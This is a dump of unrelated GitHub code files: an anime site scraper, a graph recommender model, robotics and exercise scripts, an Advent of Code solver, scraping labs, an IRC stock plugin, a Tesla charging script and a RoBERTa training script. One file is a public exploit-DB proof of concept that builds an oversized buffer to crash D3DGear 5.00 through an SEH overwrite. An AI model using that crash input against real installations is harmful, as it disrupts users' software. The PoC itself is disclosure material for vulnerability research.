span')\n\t\t\t\tvalue = list()\n\t\t\t\tif not items:\n\t\t\t\t\tcontinue\n\t\t\t\tif len(items)==1:\n\t\t\t\t\ttext_in_tag = items[0].text\n\t\t\t\t\ttext_after_tag = ' '.join(items[0].next_sibling.split())\n\t\t\t\t\tif text_in_tag == \"Релиз от:\":\n\t\t\t\t\t\tnumbs = next(re.finditer(r\"\\d{4}\", text_after_tag), None)\n\t\t\t\t\t\tif numbs:\n\t\t\t\t\t\t\tnumb = numbs.group(0)\n\t\t\t\t\t\t\tgenres = GetGenres()\n\t\t\t\t\t\t\tfor key, val in genres.items():\n\t\t\t\t\t\t\t\tfor item in val['links']:\n\t\t\t\t\t\t\t\t\tif item[1]==str(numb):\n\t\t\t\t\t\t\t\t\t\tout['year'] = [numb]*2\n\t\t\t\t\t\t\tif not out.get('year'):\n\t\t\t\t\t\t\t\tout['year'] = [numb]\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\telif text_in_tag == 'Эпизоды:':\n\t\t\t\t\t\tout['series']['info'] = [text_after_tag]\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tvalue.append(text_in_tag)\n\t\t\t\t\tvalue.append([text_after_tag])\n\t\t\t\telse:\n\t\t\t\t\ttext = list()\n\t\t\t\t\ttag_name = items.pop(0).text\n\t\t\t\t\tif tag_name == \"Жанры:\":\n\t\t\t\t\t\titems.pop(0)\n\t\t\t\t\tvalue.append(tag_name)\n\t\t\t\t\tfor tag in items:\n\t\t\t\t\t\tif value[0] == \"Жанры:\":\n\t\t\t\t\t\t\ta = tag.select('a')\n\t\t\t\t\t\t\tif a:\n\t\t\t\t\t\t\t\ttext.append([a[0].text, a[0].get('href').split('/')[-2]])\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\ttext.append([tag.text])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ttext_in_tag = tag.text\n\t\t\t\t\t\t\tif 
text_in_tag:\n\t\t\t\t\t\t\t\ttext.append(text_in_tag)\n\t\t\t\t\tvalue.append(text)\n\t\t\t\tif value[0] == \"Жанры:\":\n\t\t\t\t\tout['genre'] = value[1]\n\t\t\t\t\tcontinue\n\t\t\t\tblocks.append(value)\n\t\t\tout['blocks'] = blocks\n\t\tfdownloads = dle_content[0].select('#fdownloads')\n\t\tif fdownloads:\n\t\t\tfrelated = fdownloads[0].select('.frelated .tc-item')\n\t\t\tif frelated:\n\t\t\t\trelated_list = list()\n\t\t\t\tfor i in frelated:\n\t\t\t\t\trelated_data = {}\n\t\t\t\t\trelated_poster = i.select('img')\n\t\t\t\t\tif related_poster:\n\t\t\t\t\t\trelated_poster = related_poster[0].get('src').replace('/thumbs/', '/')\n\t\t\t\t\t\trelated_data['poster'] = (related_poster if related_poster.startswith('//') else HentaizLink[:-1]+related_poster)\n\t\t\t\t\trelated_title = i.select('.tc-title')\n\t\t\t\t\tif related_title:\n\t\t\t\t\t\trelated_data['ru_title'] = related_title[0].text\n\t\t\t\t\trelated_data['id'] = i.get('href').split('/')[-1].split('.')[0]\n\t\t\t\t\trelated_list.append(related_data)\n\t\t\t\tif related_list:\n\t\t\t\t\tout['related'] = related_list\n\t\tout['service_title'] = ModuleTitle\n\t\tout['horny'] = hentai\n\t\treturn {\n\t\t\t'status':200,\n\t\t\t'data': out,\n\t\t}\n\telse:\n\t\treturn {\n\t\t\t'status': response.status_code,\n\t\t\t'message': messages.get('not_response'),\n\t\t}","repo_name":"Semolik/AnimePlayer","sub_path":"api/hentaiz.py","file_name":"hentaiz.py","file_ext":"py","file_size_in_byte":13800,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"23528437695","text":"import torch\nimport torch.nn.functional as F\nfrom torch_geometric.nn import GCNConv\n\n\nfrom .base import GraphRecsysModel\n\n\nclass GCNRecsysModel(GraphRecsysModel):\n def __init__(self, **kwargs):\n super(GCNRecsysModel, self).__init__(**kwargs)\n\n def _init(self, **kwargs):\n self.if_use_features = kwargs['if_use_features']\n self.dropout = kwargs['dropout']\n\n if not self.if_use_features:\n self.x = torch.nn.Embedding(kwargs['dataset']['num_nodes'], kwargs['emb_dim'], max_norm=1).weight\n else:\n raise NotImplementedError('Feature not implemented!')\n self.x, self.edge_index = self.update_graph_input(kwargs['dataset'])\n\n self.conv1 = GCNConv(kwargs['emb_dim'], kwargs['hidden_size'])\n self.conv2 = GCNConv(kwargs['hidden_size'], kwargs['repr_dim'])\n\n self.fc1 = torch.nn.Linear(2 * kwargs['repr_dim'], kwargs['repr_dim'])\n self.fc2 = torch.nn.Linear(kwargs['repr_dim'], 1)\n\n def reset_parameters(self):\n if not self.if_use_features:\n torch.nn.init.uniform_(self.x, -1.0, 1.0)\n self.conv1.reset_parameters()\n self.conv2.reset_parameters()\n torch.nn.init.uniform_(self.fc1.weight, -1.0, 1.0)\n torch.nn.init.uniform_(self.fc2.weight, -1.0, 1.0)\n\n def forward(self):\n x = F.relu(self.conv1(self.x, self.edge_index))\n x = F.dropout(x, p=self.dropout, training=self.training)\n x = self.conv2(x, self.edge_index)\n x = F.normalize(x)\n return x\n","repo_name":"356255531/graph_recsys_benchmark","sub_path":"graph_recsys_benchmark/models/gcn.py","file_name":"gcn.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"32577151158","text":"#!/usr/bin/python\n\n#\n# Exploit Author: bzyo\n# Twitter: @bzyo_\n# Exploit Title: D3DGear 5.00 Build 2175 - Buffer Overflow\n# Date: 07-11-2017\n# Vulnerable Software: D3DGear 5.00 Build 2175\n# Vendor Homepage: http://www.d3dgear.com/\n# Version: 5.00 Build 2175\n# Software Link: 
http://www.d3dgear.com/products.htm\n# Tested On: Windows 7 x86\n#\n#\n# PoC: generate crash.txt, open program, select broadcast, paste crash.txt contents in stream key\n#\n# app crashes; 00420042 Pointer to next SEH record; no eip overwrite; one unicode ppr pointer\n#\n\nfile = \"crash.txt\"\n\nbuffer = \"A\"* 1284 + \"B\"*4\nwriteFile = open (file, \"w\")\nwriteFile.write( buffer )\nwriteFile.close()","repo_name":"ryanmrestivo/red-team","sub_path":"_Resources/Exploit DB 2021-12-11/exploits/windows/dos/43410.py","file_name":"43410.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"} +{"seq_id":"3945961483","text":"import machine\nimport utime\nfrom machine import Pin, PWM\n\nservo = PWM(Pin(0))\nservo.freq(50)\nsensor = machine.Pin(28, machine.Pin.IN, machine.Pin.PULL_DOWN)\nled = machine.Pin(15, machine.Pin.OUT)\n\ndef pin_handler(pin):\n    utime.sleep_ms(100)\n    if pin.value():\n        print(\"detected\")\n        servo.duty_u16(6500)\n        utime.sleep(3)\n        servo.duty_u16(8200)\n        utime.sleep(0.5) \n    \n\nsensor.irq(trigger=machine.Pin.IRQ_RISING, handler=pin_handler)\n\nwhile True:\n    led.toggle()\n    utime.sleep(5)","repo_name":"Yichen-Hsu/02_AIOT","sub_path":"00_RaspPico_Basic/Ch7_SwipeArm_Control.py","file_name":"Ch7_SwipeArm_Control.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20310315555","text":"# Escribe una función que requiera una cantidad indefinida de argumentos. Lo que hará esta función es devolver True si en algún momento se ha ingresado el número cero repetido dos veces consecutivas.\n# Por ejemplo: (5,6,1,0,0,9,3,5) >>> True\n# (6,0,5,1,0,3,0,1) >>> False\n\ndef ceros_vecinos(*args):\n\n    contador = 0\n\n    for num in args:\n\n        if contador + 1 == len(args):\n            return False\n        elif args[contador] == 0 and args[contador + 1] == 0:\n            return True\n        else:\n            contador += 1\n\n    return False\n\n\nprint(ceros_vecinos(5, 6, 3, 6, 2, 7, 9, 5, 9, 0))\n","repo_name":"dmontenegroh/pythonCurso","sub_path":"Dia_5/Ejercicio_3.py","file_name":"Ejercicio_3.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32707352710","text":"#!/usr/bin/env python3\nimport itertools\nimport utils\nfrom typing import NamedTuple, Set\n\nSIMILARITY_FACTOR = 12\n\n\nclass Position(NamedTuple):\n    x: int\n    y: int\n    z: int\n\n    def __str__(self):\n        return f\"({self.x}, {self.y}, {self.z})\"\n\n    def __repr__(self):\n        return str(self)\n\n    def with_scanner_facing(self, n):\n        if n == 0:\n            return self\n        elif n == 1:\n            return Position(x=self.x, y=-self.y, z=-self.z)\n        elif n == 2:\n            return Position(x=self.y, y=-self.x, z=self.z)\n        elif n == 3:\n            return Position(x=-self.y, y=self.x, z=self.z)\n        elif n == 4:\n            return Position(x=self.x, y=self.z, z=-self.y)\n        elif n == 5:\n            return Position(x=self.x, y=-self.z, z=self.y)\n        else:\n            raise ValueError(f\"bad facing: {n}\")\n\n    def with_scanner_rotation(self, n):\n        if n == 0:\n            return self\n        elif n == 1:\n            return Position(x=self.z, y=self.y, z=-self.x)\n        elif n == 2:\n            return Position(x=-self.x, y=self.y, z=-self.z)\n        elif n == 3:\n            return Position(x=-self.z, y=self.y, z=self.x)\n        else:\n            raise ValueError(f\"bad rotation: {n}\")\n\n    def translate(self, dx, dy, dz):\n        return Position(x=self.x + dx, y=self.y + dy, z=self.z + 
dz)\n\n    def distance(self, p2):\n        return abs(p2.x - self.x) + abs(p2.y - self.y) + abs(p2.z - self.z)\n\n\nclass Scanner(NamedTuple):\n    id: int\n    beacons: Set[Position]\n\n\ndef orientations(beacons):\n    for f in range(6):\n        for r in range(4):\n            yield [p.with_scanner_facing(f).with_scanner_rotation(r) for p in beacons]\n\n\ndef try_merge(existing_beacons, beacons):\n    for orientation in orientations(beacons):\n        for existing_beacon in existing_beacons:\n            for candidate_beacon in orientation:\n                dx = existing_beacon.x - candidate_beacon.x\n                dy = existing_beacon.y - candidate_beacon.y\n                dz = existing_beacon.z - candidate_beacon.z\n\n                total = 0\n                for point in orientation:\n                    if point.translate(dx, dy, dz) not in existing_beacons:\n                        continue\n\n                    total += 1\n                    if total >= SIMILARITY_FACTOR:\n                        result = existing_beacons.copy()\n                        result.update(p.translate(dx, dy, dz) for p in orientation)\n                        return result, Position(dx, dy, dz)\n    return None, None\n\n\ndef parse(f):\n    scanner_id = None\n    beacons = set()\n    for line in f:\n        line = line.strip()\n        if \"---\" in line:\n            if beacons:\n                yield Scanner(scanner_id, set(beacons))\n            scanner_id = int(line.replace(\"--- scanner \", \"\").replace(\"---\", \"\"))\n            beacons = set()\n        elif line:\n            x, y, z = line.split(\",\")\n            beacons.add(Position(int(x), int(y), int(z)))\n    if beacons:\n        yield Scanner(scanner_id, set(beacons))\n\n\ndef main():\n    scanners = list(parse(utils.input()))\n    current_beacons = scanners.pop(0).beacons\n    scanner_positions = [Position(0, 0, 0)]\n    while scanners:\n        candidate = scanners.pop(0)\n        updated_beacons, scanner_position = try_merge(current_beacons, candidate.beacons)\n        if updated_beacons:\n            current_beacons = updated_beacons\n            scanner_positions.append(scanner_position)\n            print(f\"merged {candidate.id} (scanner at {scanner_position})\", end=\", \")\n        else:\n            scanners.append(candidate)\n            print(f\"failed to merge {candidate.id}\", end=\", \")\n        print(f\"{len(scanners)} remaining, {len(current_beacons)} points known\")\n\n    max_distance = max(p1.distance(p2) for p1, p2 in itertools.combinations(scanner_positions, 2))\n    print(f\"max scanner distance: {max_distance}\")\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"technocoreai/aoc2021","sub_path":"aoc19.py","file_name":"aoc19.py","file_ext":"py","file_size_in_byte":4054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40820927848","text":"\n## Somu - Lab 03 - 09th Nov 2019\n# Exercise 1\nimport requests\nfrom bs4 import BeautifulSoup\nimport csv\n\npage = requests.get(\"http://dataquestio.github.io/web-scraping-pages/simple.html\")\nprint (page)\nprint (\"-------------\")\nprint (page.content)\n\n# Exercise 2\nsoup1 = BeautifulSoup(page.content,'html.parser')\nprint('----------')\nprint (soup1.tr)\n\n# Exercise 3\nwith open(\"Lab01 - carviewer.html\") as fp:\n    soup = BeautifulSoup(fp,'html.parser')\nprint (soup.tr)\n\n# Exercise 4\nwith open(\"Lab01 - carviewer.html\") as fp:\n    soup = BeautifulSoup(fp,'html.parser')\nprint (soup.tr)\n\n# Exercise 5\nrows = soup.findAll(\"tr\")\nfor row in rows:\n    print(\"-----------\")\n    print(row)\n\n# Exercise 6\nfor row in rows:\n    cols = row.findAll(\"td\")\n    for col in cols:\n        print(col.text)\n\n# Exercise 7\ndataList = []\nfor col in cols:\n    dataList.append(col.text)\n    print (dataList)\n\n# Exercise 8\nemployee_file = open('employee_file.csv', mode='w')\nemployee_writer = 
csv.writer(employee_file,delimiter=',',quotechar='\"',quoting=csv.QUOTE_MINIMAL)\nemployee_writer.writerow(['John','Accounting','November'])\nemployee_writer.writerow(['Eric','IT','March'])\nemployee_file.close()\n\n# Exercise 9\nwith open(\"Lab01 - carviewer.html\") as fp:\n    soup = BeautifulSoup(fp,'html.parser')\nemployee_file = open('week02data.csv', mode='w')\nemployee_writer = csv.writer(employee_file,delimiter=',',quotechar='\"',quoting=csv.QUOTE_MINIMAL)\n\nrows=soup.findAll(\"tr\")\nfor row in rows:\n    cols = row.findAll(\"td\")\n    dataList = []\n    for col in cols:\n        if col.text not in (\" delete\",\" update\"):\n            dataList.append(col.text)\n    employee_writer.writerow(dataList)\nemployee_file.close()\n\n# Exercise 10\n## introduced if statement to check for the text delete and Update\n\n# Exercise 11 and 12\npage = requests.get(\"https://www.myhome.ie/residential/mayo/property-for-sale?page=1\")\nsoup = BeautifulSoup(page.content,'html.parser')\nprint (soup.prettify())\n\n# Exercise 13 and 14\nlistings = soup.find(\"div\", class_=\"PropertyListingCard\")\nprint(listings)\n\n# Exercise 15\nprice = listings.find(class_=\"PropertyListingCard__Price\").text\nprint(price)\n\n# Exercise 16\nAddress = listings.find(class_=\"PropertyListingCard__Address\").text\nprint(Address)\n\n# Exercise 17\n\nlistings = soup.findAll(\"div\", class_=\"PropertyListingCard\")\n\nfor listing in listings:\n    entry = []\n    price = listing.find(class_=\"PropertyListingCard__Price\").text\n    entry.append(price)\n    address = listing.find(class_=\"PropertyListingCard__Address\").text\n    entry.append(address)\n    print(entry)\n\n# Exercise 18\n\npage = requests.get(\"https://www.myhome.ie/residential/mayo/property-for-sale?page=1\")\nsoup = BeautifulSoup(page.content,'html.parser')\n\nhome_file = open('week03Myhome.csv', mode='w')\nhome_writer = csv.writer(home_file,delimiter=',',quotechar='\"',quoting=csv.QUOTE_MINIMAL)\n\nlistings = soup.findAll(\"div\", class_=\"PropertyListingCard\")\n\nfor listing in listings:\n    entry = []\n    price = listing.find(class_=\"PropertyListingCard__Price\").text\n    entry.append(price)\n    address = listing.find(class_=\"PropertyListingCard__Address\").text\n    entry.append(address)\n\n    home_writer.writerow(entry)\nhome_file.close()\n\n \n\n\n\n\n\n\n\n\n\n","repo_name":"SomanathanSubramaniyan/Data-Representation","sub_path":"Week03/Lab03.py","file_name":"Lab03.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20449385777","text":"#!/usr/bin/env python3\n\"\"\"\nSpecificity\n\"\"\"\n\nimport numpy as np\n\n\ndef specificity(confusion):\n    \"\"\"\n    Function that calculates the specificity\n    for each class in a confusion matrix\n    \"\"\"\n    true = np.diagonal(confusion)\n    m_total = np.sum(confusion)\n    array_m_total = np.full_like(confusion[0], m_total)\n    cross_1 = np.sum(confusion, axis=0)\n    cross_2 = np.sum(confusion.T, axis=0)\n    true_neg = array_m_total + true - cross_1 - cross_2\n    fp = cross_1 - true\n    spec = true_neg / (fp + true_neg)\n    return spec\n","repo_name":"nildiert/holbertonschool-machine_learning","sub_path":"supervised_learning/0x04-error_analysis/3-specificity.py","file_name":"3-specificity.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42817093456","text":"from dotenv import load_dotenv\nimport os\nfrom datetime import datetime, timezone, timedelta\nimport logging\nfrom 
logging.handlers import RotatingFileHandler\nimport asyncio\nfrom tesla_api import TeslaApiClient\nfrom nordpool import elspot\nimport time\n\n# Get the basic logging set up\nlogger = logging.getLogger(__name__)\nlog_folder = os.path.dirname(os.path.abspath(__file__))\nlog_file = os.path.join(log_folder, 'teslapower.log')\nlogger.setLevel(logging.INFO)\nfile_handler = RotatingFileHandler(log_file, maxBytes=102400, backupCount=2)\nformatter = logging.Formatter(\n    '%(asctime)s %(levelname)s: %(message)s', '%Y-%m-%d %H:%M:%S')\nfile_handler.setFormatter(formatter)\nlogger.addHandler(file_handler)\n\nlogger.info('*** TeslaPowerSetting starting ***')\n\n# First set some basic config\nload_dotenv()\ntesla_token = os.getenv(\"TESLA_TOKEN\")\ntesla_user = os.getenv(\"TESLA_USER\")\ntesla_password = os.getenv(\"TESLA_PASS\")\nhome_lat = os.getenv(\"HOME_LAT\")\nhome_long = os.getenv(\"HOME_LONG\")\nwork1_lat = os.getenv(\"WORK1_LAT\")\nwork1_long = os.getenv(\"WORK1_LONG\")\nwork2_lat = os.getenv(\"WORK2_LAT\")\nwork2_long = os.getenv(\"WORK2_LONG\")\nbase_currency = os.getenv(\"BASE_CURRENCY\")\nmin_percent = os.getenv(\"MIN_PERCENT\")\nmax_percent = os.getenv(\"MAX_PERCENT\")\n# Nordpool prices are per currency/MWh where household expenses are normally currency/kWh - so set threshold as 1000x\ncheap_threshold = float(os.getenv(\"CHEAP_THRESHOLD\", \"0\"))\n\n\n# Handle non-defined values\nif not min_percent:\n    min_percent = 60\nif not max_percent:\n    max_percent = 90\nif not base_currency:\n    base_currency = 'DKK'\n\nareas = ['DK2']  # currently only supports 1 area\nprice_ext = base_currency + '/MWh'\n\n\ndef get_prices():\n    '''Function to get the prices from the Nordpool module'''\n    # Nordpool module returns times as UTC, generate a 'now' to compare with\n    # If this runs too early in the day, the prices may not be set for tomorrow yet (will be 'inf' as float) -- seems the price is announced around 1pm CET\n    now = datetime.now(tz=timezone.utc)\n    today = now.date()\n    tomorrow = now.date() + timedelta(days=1)\n    # Then get the power price in desired currency - both for today and tomorrow\n    logger.info('Grabbing the updated prices...')\n    prices_spot = elspot.Prices(currency=base_currency)\n    prices_today = prices_spot.hourly(end_date=today, areas=areas)[\n        'areas'][areas[0]]['values']\n    prices_tomorrow = prices_spot.hourly(end_date=tomorrow, areas=areas)[\n        'areas'][areas[0]]['values']\n    logger.debug(f'prices_today: {prices_today}')\n    logger.debug(f'prices_tomorrow: {prices_tomorrow}')\n    return prices_today, prices_tomorrow\n\n\ndef determine_better_price(tonight, tomorrow=None):\n    '''Function to determine the best charge time and charge level based on the available prices.'''\n    better_price_tomorrow = False\n    if tomorrow is None or tomorrow[0]['value'] == float('inf'):\n        # check for None first, otherwise indexing an absent list raises TypeError\n        price_tonight = tonight[-1]['value']\n        logger.info(\n            f'Only today\\'s price is available ({price_tonight} {price_ext}).')\n    else:\n        price_tonight = tomorrow[0]['value']\n        price_tomorrow = tomorrow[-1]['value']\n        logger.info(\n            f'Tomorrow\\'s prices ({price_tomorrow} {price_ext}) are available and will be used to compare against today\\'s prices ({price_tonight} {price_ext}).')\n        if price_tomorrow * 1.05 < price_tonight:\n            # If the price for tomorrow night is better, then let's utilise that instead! 
(adding 5% to tomorrow's price in case they are almost even)\n            better_price_tomorrow = True\n            logger.info(\n                f'The best price is tomorrow night: {price_tomorrow} (+5%: {price_tomorrow * 1.05}) {price_ext}.')\n        else:\n            logger.info(\n                f'The best price is tonight: {price_tonight} {price_ext}.')\n    return better_price_tomorrow, price_tonight\n\n# Thoughts\n# - ideally, we want tomorrow's prices because it will have both the price of tonight (midnight) and tomorrow night (11pm)\n# - as a backup, we can use today's prices, because it will have the price tonight (11pm) and the useless one: yesterday night (midnight between yesterday and today)\n# -- Conclusion: So there are two interesting prices and one back up price:\n# --- #1: The price tonight -- which is prices_tomorrow[0]\n# --- #2: The price tomorrow night -- which is prices_tomorrow[-1]\n# --- #3: The price tonight (1 hr earlier) -- which is prices_today[-1]\n\n# So the logic should be as follows:\n# 1) If the car is set >90% charge limit -> do nothing, we're in Trip Mode™\n# 2) If the car is set to <= 90% charge limit -> decide whether to charge much (max_percent) or little (min_percent)\n# 2a) If the price is below threshold tonight -> set charge to max_percent\n# 2a*) unless it's even lower tomorrow?\n\n\ndef get_charge_target():\n    '''Function to determine desired charge target - doesn't look at Trip Mode'''\n    prices_today, prices_tomorrow = get_prices()\n    better_price_tomorrow, price_tonight = determine_better_price(\n        prices_today, prices_tomorrow)\n    if price_tonight < cheap_threshold and not better_price_tomorrow:\n        # If power is cheap, we're not in trip mode and the price is not even better tomorrow\n        logger.info('Wow, cheap price tonight! ' +\n                    str(price_tonight) + \" \" + str(price_ext))\n        return max_percent\n    else:\n        # Otherwise return the min percentage\n        return min_percent\n\n\nasync def main():\n    '''Call the Tesla API, get the car, get the charge limit, and set the desired charge target if not in Trip Mode'''\n    charge_target = int(get_charge_target())\n    client = TeslaApiClient(email=tesla_user,\n                            password=tesla_password, token=tesla_token)\n    vehicles = await client.list_vehicles()\n\n    # TODO: I only have Tesla so far, so being lazy. 
:) -- fix if/when relevant\n    car = vehicles[0]\n\n    # Let's set a timeout of 10 mins, then we give up\n    timeout = time.time() + 60*10\n    while not car.state.lower() == 'online':\n        if time.time() > timeout:\n            logger.info('Timeout of 10 minutes reached, giving up...')\n            break\n        logger.info('The car is not currently awake, wake-up signal sent.')\n        await car.wake_up()\n        time.sleep(15)\n        vehicles = await client.list_vehicles()\n        car = vehicles[0]\n\n    current_charge_limit = (await car.charge.get_state())['charge_limit_soc']\n    # If charge limit is 90 or less, we're not in Trip Mode™\n    if current_charge_limit <= 90:\n        logger.info(\n            f'The current charge limit was {current_charge_limit} %, setting it to {charge_target} % (no Trip Mode detected).')\n        await car.charge.set_charge_limit(charge_target)\n    else:\n        logger.info(\n            f'Trip Mode detected, so leaving the car with {current_charge_limit} % charge limit.')\n\n    await client.close()\n\n\nif __name__ == '__main__':\n    asyncio.run(main())\n    logger.info('*** TeslaPowerSetting ended gracefully ***')\n","repo_name":"Antra/PyTeslaPowerSet","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7021,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"14036939562","text":"from e2etests.tests.test_base import BaseTest\n\n\nclass UserCannotSeePagesBeforeLoginToApplication(BaseTest):\n    def test_user_cannot_see_pages_before_login_to_application(self):\n        self.open_login_page()\n\n        actual_error_message = self.open_incorrect_url('/delete_all_tasks').read_error_message()\n\n        expected_error_message = 'You should be logged in to see that page. Please go to Login page or to Sign up page!'\n\n        self.assertEqual(expected_error_message, actual_error_message,\n                         'Error message is not displayed after incorrect redirection')\n","repo_name":"adrianashymoniak/TaskBoard","sub_path":"e2etests/tests/test_user_cannot_see_pages_before_login_to_application.py","file_name":"test_user_cannot_see_pages_before_login_to_application.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20606662095","text":"import re\nimport requests\nfrom datetime import datetime, timedelta\n\nfrom supybot import utils, plugins, ircutils, callbacks\nfrom supybot.commands import *\ntry:\n    from supybot.i18n import PluginInternationalization\n    _ = PluginInternationalization('Stocks')\nexcept ImportError:\n    # Placeholder that allows to run the plugin on a bot\n    # without the i18n module\n    _ = lambda x: x\n\nclass Stocks(callbacks.Plugin):\n    \"\"\"Provides access to stocks data\"\"\"\n    threaded = True\n\n    def get_symbol(self, irc, session, symbol):\n        api_key = self.registryValue('alphavantage.api.key')\n        if not api_key:\n            irc.error('Missing API key, ask the admin to get one and set '\n                      'supybot.plugins.Stocks.alphavantage.api.key', Raise=True)\n\n        try:\n            return session.get('https://www.alphavantage.co/query?function=GLOBAL_QUOTE&symbol={symbol}&apikey={api_key}'.format(symbol=symbol,\n                               api_key=api_key)).json()\n        except Exception:\n            raise\n\n\n    def get_message(self, irc, session, symbol):\n        # Do regex checking on symbol to ensure it's valid\n        if not re.match(r'^[\\w^=:.\\-]{1,10}$', symbol):\n            irc.errorInvalid('symbol', symbol, Raise=True)\n\n        # Get data from API\n        data = self.get_symbol(irc, session, symbol)\n\n        if not data:\n            irc.error(\"{symbol}: An error occurred.\".format(symbol=symbol), Raise=True)\n\n        if 'Error 
Message' in data.keys():\n            irc.error(\"{symbol}: {message}\".format(symbol=symbol, message=data['Error Message']), Raise=True)\n\n        symbol = data['Global Quote']['01. symbol']\n        # open = data['Global Quote']['02. open']\n        # high = data['Global Quote']['03. high']\n        # low = data['Global Quote']['04. low']\n        price = float(data['Global Quote']['05. price'])\n        # volume = data['Global Quote']['06. volume']\n        # latest_trading_day = data['Global Quote']['07. latest trading day']\n        # previous_close = data['Global Quote']['08. previous close']\n        change = float(data['Global Quote']['09. change'])\n        change_percent = float(data['Global Quote']['10. change percent'].strip('%'))\n\n        message = (\n            '{symbol} {price:g} '\n        )\n\n        if change >= 0.0:\n            message += ircutils.mircColor('\\u25b2 {change:g} ({change_percent:g}%)', 'green')\n        else:\n            message += ircutils.mircColor('\\u25bc {change:g} ({change_percent:g}%)', 'red')\n\n        message = message.format(\n            symbol=ircutils.bold(symbol),\n            price=price,\n            change=change,\n            change_percent=change_percent,\n        )\n\n        return message\n\n    @wrap([many('something')])\n    def stock(self, irc, msg, args, symbols):\n        \"\"\"<symbol> [<symbol> [<symbol> ...]]\n\n        Returns stock data for single or multiple symbols\"\"\"\n\n        max_symbols = self.registryValue('alphavantage.maxsymbols')\n        count_symbols = len(symbols)\n\n        if count_symbols > max_symbols:\n            irc.error(\"Too many symbols. Maximum count {}. Your count: {}\".format(max_symbols, count_symbols), Raise=True)\n\n        with requests.Session() as session:\n            messages = map(lambda symbol: self.get_message(irc, session, symbol), symbols)\n\n        irc.replies(messages, joiner=' | ')\n\nClass = Stocks\n\n\n# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:\n","repo_name":"progval/Supybot-plugins","sub_path":"Stocks/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":3405,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"21"} +{"seq_id":"14353549963","text":"# Notebook edition (link to original of the reference blogpost [link]\n# (https://huggingface.co/blog/how-to-train)).\n\nfrom tokenizers import ByteLevelBPETokenizer\nfrom tokenizers.processors import BertProcessing\nfrom transformers import RobertaConfig, RobertaTokenizer\nfrom transformers import RobertaForMaskedLM\nfrom transformers import LineByLineTextDataset\nfrom transformers import DataCollatorForLanguageModeling\nfrom transformers import Trainer, TrainingArguments\nfrom transformers import pipeline\n\nimport torch\nimport transformers\nfrom pathlib import Path\nfrom datasets import load_dataset\nimport os\n\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nprint(f\"{device} is available in torch\")\nprint(\"transformers : \", transformers.__version__)\n\npaths = [str(x) for x in Path(\"../data/transformers/Kantai\").glob(\"**/*.txt\")]\npaths = \"../data/transformers/Kantai/kant.txt\"\nprint(paths)\n\ntokenizer = ByteLevelBPETokenizer()\ntokenizer.train(\n    files=paths,\n    vocab_size=52000,\n    min_frequency=2,\n    special_tokens=[\n        \"<s>\",\n        \"<pad>\",\n        \"</s>\",\n        \"<unk>\",\n        \"<mask>\",\n    ],\n)\n\n\ntoken_dir = \"../data/transformers/Kantai/models/\"\nif not os.path.exists(token_dir):\n    os.makedirs(token_dir)\ntokenizer.save_model(directory=token_dir)\n\ntokenizer = ByteLevelBPETokenizer(vocab=token_dir + \"vocab.json\", merges=token_dir + \"merges.txt\")\nprint(tokenizer.encode(\"The Critique of Pure Reason.\"))\nprint(tokenizer.encode(\"The Critique of Pure Reason.\").tokens)\n\nprint(tokenizer.encode(\"The 
Tokenizer.\"))\nprint(tokenizer.token_to_id(\"er\"))\n\ntokenizer._tokenizer.post_processor = BertProcessing(\n (\"\", tokenizer.token_to_id(\"\")),\n (\"\", tokenizer.token_to_id(\"\")),\n)\ntokenizer.enable_truncation(max_length=512)\n\n\nconfig = RobertaConfig(\n vocab_size=52000,\n max_position_embeddings=514,\n num_attention_heads=12,\n num_hidden_layers=6,\n type_vocab_size=1,\n)\nconfig.to_json_file(token_dir + \"config.json\")\nprint(config)\n\n\ntokenizer = RobertaTokenizer.from_pretrained(token_dir, max_length=512)\nmodel = RobertaForMaskedLM(config=config)\nprint(model)\nprint(\"total parameters : \", model.num_parameters())\n\nnum_params = 0\nparams = list(model.parameters())\nfor param in params:\n try:\n L2 = len(param[0])\n except TypeError:\n L2 = 1\n num_params += len(param) * L2\nprint(\"total parameters : \", num_params)\n\n\n# dataset = load_dataset(\"text\", data_files=\"../data/transformers/Kantai/kant.txt\")\n\ndataset = LineByLineTextDataset(\n tokenizer=tokenizer,\n file_path=\"../data/transformers/Kantai/kant.txt\",\n block_size=128,\n)\n\ndata_collator = DataCollatorForLanguageModeling(tokenizer=tokenizer, mlm=True, mlm_probability=0.15)\ntraining_args = TrainingArguments(\n output_dir=token_dir,\n overwrite_output_dir=True,\n num_train_epochs=1,\n per_device_train_batch_size=64,\n save_steps=10_000,\n save_total_limit=2,\n)\n\ntrainer = Trainer(\n model=model,\n args=training_args,\n data_collator=data_collator,\n train_dataset=dataset,\n)\n\ntrainer.train()\ntrainer.save_model(token_dir, 